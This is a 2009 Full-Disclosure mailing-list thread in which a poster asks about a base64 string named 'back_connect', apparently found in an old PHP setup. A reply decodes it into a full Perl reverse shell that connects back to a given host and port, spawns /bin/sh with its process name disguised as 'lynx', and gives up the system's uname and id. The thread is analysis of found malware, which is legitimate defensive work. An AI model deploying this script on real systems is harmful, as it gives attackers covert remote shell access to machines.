Technically it doesn't decrypt to anything, it decodes. :)
On Feb 10, 2009, at 1:44 PM, Razi Shaban wrote: > On Tue, Feb 10, 2009 at 8:23 PM, sr. <static...@gmail.com> wrote: >> can anyone tell me what encoding this is? >> >> $ >> back_connect >> = >> "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj >> aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR >> hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT >> sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI >> kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi >> KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl >> OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; >> >> this has to do with old php 4.x.x version with magic quotes enabled. >> i'm just trying to figure out what the connect back code does. >> >> any input is much appreciated. >> >> thx, >> >> sr. >> > > Base64, the "==" at the end gives it away. It decrypts to: > > #!/usr/bin/perl > use Socket; > $cmd= "lynx"; > $system= 'echo "`uname -a`";echo "`id`";/bin/sh'; > $0=$cmd; > $target=$ARGV[0]; > $port=$ARGV[1]; > $iaddr=inet_aton($target) || die("Error: $!\n"); > $paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n"); > $proto=getprotobyname('tcp'); > socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); > connect(SOCKET, $paddr) || die("Error: $!\n"); > open(STDIN, ">&SOCKET"); > open(STDOUT, ">&SOCKET"); > open(STDERR, ">&SOCKET"); > system($system); > close(STDIN); > close(STDOUT); > close(STDERR); > > -- > > Regards, > Razi Shaban > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ Simon Smith si...@snosoft.com -------------------------------------- Subscribe to our blog http://snosoft.blogspot.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/